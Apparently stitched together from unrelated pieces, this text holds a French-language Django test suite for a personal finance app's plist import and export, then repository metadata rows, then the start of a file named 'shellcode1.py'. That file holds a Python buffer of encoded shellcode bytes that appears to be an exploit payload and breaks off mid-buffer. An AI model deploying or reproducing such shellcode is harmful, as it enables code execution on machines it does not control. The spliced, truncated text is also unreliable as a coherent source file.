self.compare(sorted(lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request).most_common()),
[('categorie', 0), ('compte', 0), ('ope', 0)])
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_2"))
def test_element_import3(self):
"""avec crea, modif de cat et compte"""
self.compare(sorted(lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request).most_common()),
[('categorie', 1), ('compte', 1)])
self.assertmessagecontains(self.request, "catégorie (16) 'Cat aded' type:d créée")
self.assertmessagecontains(self.request, "compte (7) 'Ghh' créé")
class Test_item_modif_effectives_cote_cat(Test_import_abstract):
def setUp(self):
self.request = self.request_get('outils')
self.lastmaj = datetime.datetime(2014, 6, 15, 00, 25, 14, tzinfo=tz.utc)
self.cat = models.Cat.objects.create(pk=16, nom="Cat aded", type="d", couleur=0)
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_3"))
def test_element_import4(self):
"""teste modification standart"""
self.cpt = models.Compte.objects.create(pk=7, nom='hjhjhkh', couleur='#FFFFFF')
self.cat.nom = "Cat initial"
self.cat.type = 'r'
self.cat.couleur = '#FFFFFF'
self.cat.save()
self.compare(sorted(lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request).most_common()),
[('categorie', 1), ('compte', 1)])
self.assertmessagecontains(self.request,
"catégorie (16) 'Cat aded' type:d modifiée comme ca: nom: Cat initial => Cat aded, couleur: #FFFFFF => #000000, type: r => d")
self.assertmessagecontains(self.request,
"compte (7) 'Ghh' modifié comme ca: nom: hjhjhkh => Ghh, couleur: #FFFFFF => #000000")
cat = models.Cat.objects.get(pk=16)
self.compare(cat.nom, 'Cat aded')
self.compare(cat.couleur, '#000000')
self.compare(cat.type, 'd')
obj = models.Compte.objects.get(pk=7)
self.compare(obj.nom, 'Ghh')
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_5"))
def test_element_import6(self):
"""ttest si cat deja cree"""
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args,
("attention la catégorie (16) 'Cat aded' type:d existe déja alors qu'on demande de la créer", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_6"))
def test_element_import7(self):
"""ttest si modif alors que cat pas cree"""
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"attention la catégorie (1111) 'Cat aded' type:d n'existe pas alors qu'on demande de la modifier", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_8"))
@override_settings(ID_CAT_OST=2)
def test_element_import8(self):
"""ttest si modif alors que cat par defaut"""
models.Cat.objects.create(pk=2, nom="Cat ost", type="r", couleur='#FFFFFF')
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request, "impossible de modifier la cat (2) 'Cat aded' type:d")
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_9"))
def test_element_import9(self):
"""ttest si modif cat avec le nom deja cree"""
self.cat.type = 'r'
self.cat.couleur = '#FFFFFF'
self.cat.save()
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request,
"catégorie (16) 'Cat aded' type:d modifiée comme ca: couleur: #FFFFFF => #000000, type: r => d")
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_10"))
def test_element_import10(self):
"""ttest si suppr alors que cat pas cree"""
self.cat.delete()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"attention la catégorie (16) 'Cat aded' type:d n'existe pas alors qu'on demande de la supprimer", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_11"))
def test_element_import11(self):
"""ttest si suppr alors que cat deja utilise ds ope"""
self.cpt = models.Compte.objects.create(pk=7, nom='Ghh', couleur=0)
self.moyen = models.Moyen.objects.create(id=settings.MD_CREDIT, nom="dd", type="r")
self.ope = models.Ope.objects.create(compte=self.cpt, date=datetime.date(2014, 6, 15), montant=250, tiers=models.Tiers.objects.get_or_create(nom="tiers", defaults={'nom': "tiers"})[0], cat=self.cat, moyen=self.moyen)
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(("catégorie non supprimable (16) 'Cat aded' type:d car elle a des opérations rattachées", ),
exception_context_manager.exception.args)
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_12"))
@override_settings(ID_CAT_OST=2)
def test_element_import12(self):
"""tente de supprimer une categorie par defaut"""
models.Cat.objects.create(pk=2, nom="Cat ost", type="r", couleur='#FFFFFF')
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(("impossible de supprimer la catégorie (2)", ), exception_context_manager.exception.args)
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_12_1"))
def test_element_import12_1(self):
"""ttest suprr d'une cat"""
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request, "catégorie (Cat aded) #16 supprimée")
class Test_import_item_modif_effectives_cote_compte(Test_import_abstract):
def setUp(self):
self.request = self.request_get('outils')
self.lastmaj = datetime.datetime(2014, 6, 15, 00, 25, 14, tzinfo=tz.utc)
self.cpt = models.Compte.objects.create(pk=7, nom='hjhjhkh', couleur=0)
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_4"))
def test_element_import5(self):
"""exception si compte deja cree"""
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args,
("attention le compte (7) 'Ghh' existe déja alors qu'on demande de le créer", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_13"))
def test_element_import13(self):
"""ttest si modif compte avec le nom deja cree"""
self.cpt.couleur = "#FFFFFF"
self.cpt.save()
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request, "compte (7) 'hjhjhkh' modifié comme ca: couleur: #FFFFFF => #000000")
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_14"))
def test_element_import14(self):
"""ttest si suppr alors que compte pas cree"""
self.cpt.delete()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"attention le compte 7 n'existe pas pour ce nom (hjhjhkh) alors qu'on demande de le supprimer", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_15"))
def test_element_import15(self):
"""ttest si suppr alors que compte deja utilise ds ope"""
cat = models.Cat.objects.create(pk=16, nom="Cat aded", type="r", couleur='#FFFFFF')
moyen = models.Moyen.objects.create(id=settings.MD_CREDIT, nom="dd", type="r")
models.Ope.objects.create(compte=self.cpt, date=datetime.date(2014, 6, 15), montant=250,
tiers=models.Tiers.objects.get_or_create(nom="tiers", defaults={'nom': "tiers"})[0],
cat=cat, moyen=moyen)
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args,
("compte non supprimable (7) 'hjhjhkh' car il a des opérations ou des écheances rattachées", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_16"))
def test_element_import16(self):
"""ttest suppr d'un compte"""
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request, "compte (7) 'hjhjhkh' supprimé")
class Test_import_item_modif_effectives_cote_ope(Test_import_abstract):
def setUp(self):
self.request = self.request_get('outils')
self.lastmaj = datetime.datetime(2014, 6, 15, 00, 25, 14, tzinfo=tz.utc)
self.cat = models.Cat.objects.create(pk=1, nom="Cat aded", type="d", couleur=0)
self.cat2 = models.Cat.objects.create(pk=2, nom="Cat aded2", type="d", couleur=0)
self.cpt = models.Compte.objects.create(pk=1, nom='Ghh', couleur=0)
self.cpt2 = models.Compte.objects.create(pk=2, nom='Ghh2', couleur=0)
self.moyen_credit = models.Moyen.objects.create(id=settings.MD_CREDIT, nom="rr", type="r")
self.moyen_debit = models.Moyen.objects.create(id=settings.MD_DEBIT, nom="dd", type="d")
self.tiers = models.Tiers.objects.get_or_create(nom="Ope standart", defaults={'nom': "Ope standart"})[0]
self.tiers2 = models.Tiers.objects.get_or_create(nom="tiers2", defaults={'nom': "tiers2"})[0]
self.ope = models.Ope.objects.create(pk=66, compte=self.cpt2, date=datetime.date(2013, 6, 15), montant=25, tiers=self.tiers2,
cat=self.cat2, moyen=self.moyen_credit)
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_17"))
def test_element_import17(self):
"""si un compte pour une ope n'existe pas"""
self.ope.delete()
self.cpt.delete()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"attention le compte (1) n'existe pas alors qu'on le demande pour l'opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_18"))
def test_element_import18(self):
"""si une categorie pour une ope n'existe pas"""
self.ope.delete()
self.cat.delete()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"attention la catégorie (1) n'existe pas alors qu'on le demande pour l'opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_19"))
def test_element_import19(self):
"""si une ope existe deja"""
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"attention l'opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 existe déja alors qu'on demande de la créer", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_20"))
def test_element_import20(self):
"""test ope cree sans probleme"""
self.ope.delete()
self.tiers.delete()
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request, "tiers 'Ope standart' créé")
self.assertEqual(str(models.Ope.objects.get(id=66)),
"(66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: Ghh")
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_21"))
def test_element_import21(self):
"""test ope cree sans probleme"""
self.ope.delete()
self.cat.delete()
self.cpt.delete()
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertEqual(str(models.Ope.objects.get(id=66)),
"(66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: hjhjhkh")
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_22"))
def test_element_import22(self):
"""test si ope a mofifier n'existe pas"""
self.ope.delete()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"attention cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 n'existe pas alors qu'on demande de la modifier", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
def test_element_import23(self):
"""test si ope mere"""
fille = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=-10.25, tiers=self.tiers,
cat=self.cat, moyen=self.moyen_debit)
fille.mere = self.ope
fille.save()
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request,
"impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est mère")
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
def test_element_import24(self):
"""test si ope fille"""
mere = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=-10.25, tiers=self.tiers,
cat=self.cat, moyen=self.moyen_debit)
self.ope.mere = mere
self.ope.save()
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request,
"impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est fille", )
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
def test_element_import25(self):
"""test si ope rapprochee"""
rapp = models.Rapp.objects.create(nom="test_rapp")
self.ope.rapp = rapp
self.ope.save()
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request,
"impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est rapprochée", )
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
def test_element_import26(self):
"""test si ope avec compte ferme"""
self.cpt2.ouvert = False
self.cpt2.save()
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request,
"impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car son compte est fermé", )
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
def testelement_import27(self):
"""test si ope jumelle"""
jumelle = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=10.25,
tiers=self.tiers, cat=self.cat, moyen=self.moyen_credit)
self.ope.jumelle = jumelle
self.ope.save()
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request,
"impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est jumellée", )
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_23"))
def test_element_import28(self):
"""test si modif d'ope pointee"""
self.ope.pointe = True
self.ope.save()
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request,
"impossible de modifier cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est pointée", )
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
def test_element_import31(self):
"""test si ope n'existe pas alors qu'elle va etre supprimer"""
self.ope.delete()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args,
("attention cette opération 66 n'existe pas alors qu'on demande de la supprimer", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
def test_element_import32(self):
"""test supprimeer une mere"""
fille = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=-10.25, tiers=self.tiers,
cat=self.cat, moyen=self.moyen_debit)
fille.mere = self.ope
fille.save()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est mère", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
def test_element_import33(self):
"""test si ope fille"""
mere = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=-10.25, tiers=self.tiers,
cat=self.cat, moyen=self.moyen_debit)
self.ope.mere = mere
self.ope.save()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est fille", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
def test_element_import34(self):
"""test si ope rapprochee"""
rapp = models.Rapp.objects.create(nom="test_rapp")
self.ope.rapp = rapp
self.ope.save()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est rapprochée", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
def test_element_import35(self):
"""test si ope avec compte ferme"""
self.cpt2.ouvert = False
self.cpt2.save()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car son compte est fermé", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
def test_element_import36(self):
"""test si ope jumelle"""
jumelle = models.Ope.objects.create(pk=67, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=10.25,
tiers=self.tiers, cat=self.cat, moyen=self.moyen_credit)
self.ope.jumelle = jumelle
self.ope.save()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est jumellée", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
def test_element_import37(self):
"""test si modif d'ope pointee"""
self.ope.pointe = True
self.ope.save()
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"impossible de supprimer cette opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 car elle est pointée", ))
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
def test_element_import38(self):
"""test si ope modifie sans probleme"""
self.ope.delete()
self.ope = models.Ope.objects.create(pk=66, compte=self.cpt, date=datetime.date(2014, 6, 16), montant=-10.25,
tiers=self.tiers, cat=self.cat, moyen=self.moyen_debit)
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.assertmessagecontains(self.request,
"opération (66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1 supprimée")
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_31"))
def test_element_import39(self):
"""test si ope modifie"""
self.ope.delete()
self.ope = models.Ope.objects.create(pk=66, compte=self.cpt, date=datetime.date(2014, 6, 15), montant=-10.25,
tiers=self.tiers, cat=self.cat, moyen=self.moyen_debit)
with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
self.compare(exception_context_manager.exception.args, (
"attention cette opération 66 existe alors qu'on demande de la supprimer mais elle est différente :\nDATE:\t2014-06-15!= 2014-06-16",))
@override_settings(CODE_DEVICE_POCKET_MONEY='totototo')
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "export_plist"))
class Test_import_money_journal_export(Test_import_abstract):
fixtures = ['test_money_journal.yaml', ]
def setUp(self):
self.request = self.request_get('outils')
self.exp = Export_icompta_plist(request=self.request)
directory = os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "export_plist", 'Applications',
'Money Journal', 'log')
efface = list()
for root, dirs, files in os.walk(directory, topdown=False):
for name in files:
efface.append(os.path.join(root, name))
os.remove(os.path.join(root, name))
for root, dirs, files in os.walk(directory, topdown=False):
for name in dirs:
efface.append(os.path.join(root, name))
os.rmdir(os.path.join(root, name))
def comp_file(self, filename, nom):
attendu = os.path.join("export_plist_attendu", 'Applications', 'Money Journal', 'log', '140', '3', '4', filename)
recu = os.path.join("export_plist", 'Applications', 'Money Journal', 'log', '140', '3', '4', filename)
self.assert2filesequal(recu, attendu, nom=nom)
def test_global(self):
# on efface la table db_log
models.Db_log.objects.all().delete()
#cat modifie
models.Db_log.objects.create(datamodel="cat", id_model=1, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07901")
#cat cree
models.Db_log.objects.create(datamodel="cat", id_model=2, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07902")
models.Db_log.objects.create(datamodel="cat", id_model=72, type_action="I", uuid="51a0004d-7f28-427b-8cf7-44ad2ac07972")
# c'est une modification d'une operation qui a ete efface (donc qui ne vas pas etre maj)
models.Db_log.objects.create(datamodel="cat", id_model=35, type_action="I", uuid="51a0004d-7f28-427b-8cf7-44ad2ac07972")
models.Cat.objects.filter(id=4).delete() # la cat 4 a ete efface
models.Db_log.objects.create(datamodel="cat", id_model=4, type_action="D", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a01")
models.Compte.objects.filter(id=1).update(nom="compte_modifie")
models.Compte.objects.create(id=3, nom="Compte nouveau")
models.Db_log.objects.create(datamodel="compte", id_model=1, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a01")
models.Db_log.objects.create(datamodel="compte", id_model=3, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a01")
#on mock les opes
models.Db_log.objects.create(datamodel="ope", id_model=1, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a01")
models.Db_log.objects.create(datamodel="ope", id_model=2, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a02")
models.Db_log.objects.create(datamodel="ope", id_model=3, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a03")
models.Db_log.objects.create(datamodel="ope", id_model=8, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a08")
models.Db_log.objects.create(datamodel="ope", id_model=9, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a09")
models.Db_log.objects.create(datamodel="ope", id_model=11, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a10")
models.Db_log.objects.create(datamodel="ope", id_model=12, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a11")
models.Db_log.objects.create(datamodel="ope", id_model=13, type_action="U", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a12")
models.Db_log.objects.create(datamodel="ope", id_model=14, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a13")
models.Db_log.objects.create(datamodel="ope", id_model=15, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a14")
models.Db_log.objects.create(datamodel="ope", id_model=16, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a15")
models.Db_log.objects.create(datamodel="ope", id_model=17, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a16")
models.Db_log.objects.create(datamodel="ope", id_model=18, type_action="I", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a17")
models.Db_log.objects.create(datamodel="ope", id_model=19, type_action="D", uuid="51a6674d-7f28-427b-8cf7-25ad2ac07a18")
date_time_action = datetime.datetime(2014, 6, 23, 18, 51, 40, tzinfo=tz.utc)
models.Db_log.objects.all().update(date_time_action=date_time_action)
mock_date = self.add_minutes(tz.make_aware(datetime.datetime(2014, 6, 23, 0, 0, 0), timezone=tz.utc))
#test effectif
with mock.patch('gsb.utils.timezone.now', mock_date.now):
nb = self.exp.all_since_date(datetime.datetime(2014, 1, 21, 19, 27, 14, tzinfo=tz.utc))
# compare nb
compare(nb, collections.Counter({'global': 20, 'ope': 14, 'cat': 4, 'compte': 2}))
#compare la liste des fichier
attendu = os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "export_plist_attendu", 'Applications',
'Money Journal')
recu = os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "export_plist", 'Applications',
'Money Journal')
list_fic_recu = list()
list_fic_attendu = list()
for root, dirs, files in os.walk(recu, topdown=False):
for name in files:
list_fic_recu.append(os.path.basename(os.path.join(root, name)))
for root, dirs, files in os.walk(attendu, topdown=False):
for name in files:
list_fic_attendu.append(os.path.basename(os.path.join(root, name)))
compare(list_fic_recu, list_fic_attendu)
#compare chaque fichier
self.comp_file('1403481660000.log', "export_plist_cat_modif")
self.comp_file('1403481720000.log', "export_plist_cat_crea")
self.comp_file('1403481780000.log', "export_plist_cat_vir_eff")
self.comp_file('1403481840000.log', "export_plist_cat_vir")
self.comp_file('1403481900000.log', "export_plist_compte_update")
self.comp_file('1403481960000.log', "export_plist_compte_insert")
self.comp_file('1403482020000.log', "export_plist_ope1_modifie_negatif")
self.comp_file('1403482080000.log', "export_plist_ope2_modifie_positif")
self.comp_file('1403482140000.log', "export_plist_ope3_ost")
self.comp_file('1403482200000.log', "export_plist_ope8_virement_sortie")
self.comp_file('1403482260000.log', "export_plist_ope9_virement_entree")
self.comp_file('1403482320000.log', "export_plist_ope11_ope_ventile_mere")
self.comp_file('1403482380000.log', "export_plist_ope12_ope_fille_1")
self.comp_file('1403482440000.log', "export_plist_ope13_ope_fille_2")
self.comp_file('1403482500000.log', "export_plist_ope14_vir_cree_sortie")
self.comp_file('1403482560000.log', "export_plist_ope15_vir_cree_entree")
self.comp_file('1403482620000.log', "export_plist_ope16_ope_mere_cree")
self.comp_file('1403482680000.log', "export_plist_ope17_ope_fille_cree_1")
self.comp_file('1403482740000.log', "export_plist_ope18_ope_fille_cree_2")
self.comp_file('1403482800000.log', "export_plist_ope19_efface")
| 61.237069
| 224
| 0.664954
| 5,725
| 42,621
| 4.785328
| 0.078777
| 0.058622
| 0.054095
| 0.034166
| 0.819718
| 0.805337
| 0.792086
| 0.771865
| 0.739086
| 0.697511
| 0
| 0.061082
| 0.203726
| 42,621
| 695
| 225
| 61.32518
| 0.746155
| 0.035335
| 0
| 0.545139
| 0
| 0.048611
| 0.197477
| 0.033858
| 0
| 0
| 0
| 0.001439
| 0.069444
| 1
| 0.085069
| false
| 0
| 0.25
| 0
| 0.348958
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c4f35e4a20d916693386c8ffce742c7492271f19
| 1,684
|
py
|
Python
|
utils/shellcode1.py
|
sivak1rl/bin-scripts
|
e015ce5ee589a9beb8be63bc18728452ef634d61
|
[
"MIT"
] | null | null | null |
utils/shellcode1.py
|
sivak1rl/bin-scripts
|
e015ce5ee589a9beb8be63bc18728452ef634d61
|
[
"MIT"
] | null | null | null |
utils/shellcode1.py
|
sivak1rl/bin-scripts
|
e015ce5ee589a9beb8be63bc18728452ef634d61
|
[
"MIT"
] | null | null | null |
buf = ""
buf += "\xdb\xdd\xd9\x74\x24\xf4\x58\xbf\x63\x6e\x69\x90\x33"
buf += "\xc9\xb1\x52\x83\xe8\xfc\x31\x78\x13\x03\x1b\x7d\x8b"
buf += "\x65\x27\x69\xc9\x86\xd7\x6a\xae\x0f\x32\x5b\xee\x74"
buf += "\x37\xcc\xde\xff\x15\xe1\x95\x52\x8d\x72\xdb\x7a\xa2"
buf += "\x33\x56\x5d\x8d\xc4\xcb\x9d\x8c\x46\x16\xf2\x6e\x76"
buf += "\xd9\x07\x6f\xbf\x04\xe5\x3d\x68\x42\x58\xd1\x1d\x1e"
buf += "\x61\x5a\x6d\x8e\xe1\xbf\x26\xb1\xc0\x6e\x3c\xe8\xc2"
buf += "\x91\x91\x80\x4a\x89\xf6\xad\x05\x22\xcc\x5a\x94\xe2"
buf += "\x1c\xa2\x3b\xcb\x90\x51\x45\x0c\x16\x8a\x30\x64\x64"
buf += "\x37\x43\xb3\x16\xe3\xc6\x27\xb0\x60\x70\x83\x40\xa4"
buf += "\xe7\x40\x4e\x01\x63\x0e\x53\x94\xa0\x25\x6f\x1d\x47"
buf += "\xe9\xf9\x65\x6c\x2d\xa1\x3e\x0d\x74\x0f\x90\x32\x66"
buf += "\xf0\x4d\x97\xed\x1d\x99\xaa\xac\x49\x6e\x87\x4e\x8a"
buf += "\xf8\x90\x3d\xb8\xa7\x0a\xa9\xf0\x20\x95\x2e\xf6\x1a"
buf += "\x61\xa0\x09\xa5\x92\xe9\xcd\xf1\xc2\x81\xe4\x79\x89"
